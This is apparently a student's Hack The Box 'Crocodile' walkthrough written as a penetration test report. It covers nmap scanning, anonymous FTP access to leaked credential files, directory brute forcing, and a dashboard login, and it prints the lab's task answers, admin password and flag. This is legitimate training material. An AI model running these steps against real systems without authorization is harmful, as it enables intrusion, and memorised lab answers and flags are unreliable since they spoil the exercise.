# Hack The Box Crocodile Walk-through

Published 2025-11-17 at https://sites.wp.odu.edu/isaac-huston/skills/network-security-analysis/hack-the-box-crocodile-walk-through/

End-to-end engagement showing service behavior, attack-path logic, and containment strategy. Reflects practical penetration testing methodology.

# Penetration Test Report: HTB Crocodile

## 1. Objective

The purpose of this engagement was to assess the security posture of the HTB Crocodile machine by identifying exposed services, enumerating available access points, and validating authentication weaknesses. This report outlines the reconnaissance process, discovered vulnerabilities, exploitation steps, and the final capture of the root flag.

---

## 2. Target Information

**Target Host:** Crocodile  
**IP Address:** 10.129.184.140  
**Operating System:** Ubuntu (Apache 2.4.41 detected)  
**Services:** FTP, HTTP, DNS (filtered)

---

## 3. Methodology

This assessment followed a straightforward workflow:

1. Recon
2. Enumeration
3. Credential Discovery
4. Web Authentication Bypass
5. Post-Authentication Validation

All testing was performed inside the authorized HTB environment.

---

## 4. Recon and Enumeration

### 4.1 Nmap Scan

**Command:**

```bash
sudo nmap -sV -O 10.129.184.140
```

### Scan Summary

Nmap revealed an open FTP server with anonymous login enabled and an Apache web server hosting the application.

| Port   | State    | Service | Version                      |
| ------ | -------- | ------- | ---------------------------- |
| 21/tcp | open     | ftp     | vsftpd 3.0.3                 |
| 53/tcp | filtered | domain  | unknown                      |
| 80/tcp | open     | http    | Apache httpd 2.4.41 (Ubuntu) |

The presence of anonymous FTP access is a critical finding.

---

## 5. FTP Enumeration

### Task 1

**Nmap switch that uses default scripts:**

```
-sC
```

### Task 2

**Service on port 21:**

```
vsftpd 3.0.3
```

Connect to FTP:

```bash
ftp 10.129.184.140
```

Login credentials:

```
Username: anonymous
```

### Task 3

**FTP response code for a successful anonymous login:**

```
230
```

### Task 4

**Anonymous login username:**

```
anonymous
```

### Task 5

**Command to download files from FTP:**

```
get
```

After logging in:

```bash
ls
```

You will find:

```
allowed.userlist
allowed.userlist.passwd
```

Download both:

```bash
get allowed.userlist
get allowed.userlist.passwd
```

### Task 6

**High-privilege-sounding username found:**

```
admin
```

These files provide the usernames and passwords used later for web authentication.

---

## 6. Web Enumeration

### Task 7

**Apache version running on the host:**

```
Apache httpd 2.4.41
```

### Task 8

**Gobuster switch for file-extension searches:**

```
-x
```

### Task 9

**PHP file discovered via directory brute force that enables login:**

Use Feroxbuster or Gobuster. Example:

```bash
feroxbuster -u http://10.129.184.140 --extensions "php,txt"
```

Important directory discovered:

```
/dashboard/
```

This redirects to:

```
login.php
```

**Answer:**

```
login.php
```

---

## 7. Exploitation

Using the credentials obtained from the FTP files:

```
username: admin
password: rKXM59ESxesUFHAd
```

Log in at:

```
http://10.129.184.140/dashboard/login.php
```

After successful authentication, the application displays the root flag.

---

## 8. Proof of Compromise

**Root Flag:**

```
c7110277ac44d78b6a9fff2232434d16
```

This confirms full access to the internal dashboard and successful compromise of the machine.

---

## 9. Recommendations

1. Disable anonymous FTP access.
2. Enforce strong authentication for file storage areas.
3. Restrict FTP exposure to trusted networks.
4. Implement directory traversal protection and enumeration rate limiting.
5. Avoid storing plaintext credentials in public directories.
6. Monitor access logs for unusual brute-force attempts.

---

## 10. Conclusion

The Crocodile machine was compromised through a combination of anonymous FTP access and exposed credential files. These credentials allowed direct authentication into the dashboard application, leading to retrieval of the root flag. Proper access control and secure credential handling would prevent this attack path.

---